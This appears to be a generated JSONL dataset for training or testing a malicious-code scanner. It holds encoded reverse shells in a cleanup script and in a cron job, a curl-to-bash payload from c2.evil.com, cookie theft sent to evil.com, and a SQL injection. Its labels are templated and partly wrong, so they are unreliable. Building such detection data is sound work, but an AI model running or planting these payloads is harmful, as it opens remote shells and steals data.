{"id": "hard_obfuscated_attacks_00000", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00001", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.6c7c7129.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00002", "source": "hard_negatives", "source_license": "generated", "text": "var _0x3a2d=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0xebec[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00003", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00004", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00005", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00006", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00007", "source": "hard_negatives", "source_license": "generated", "text": "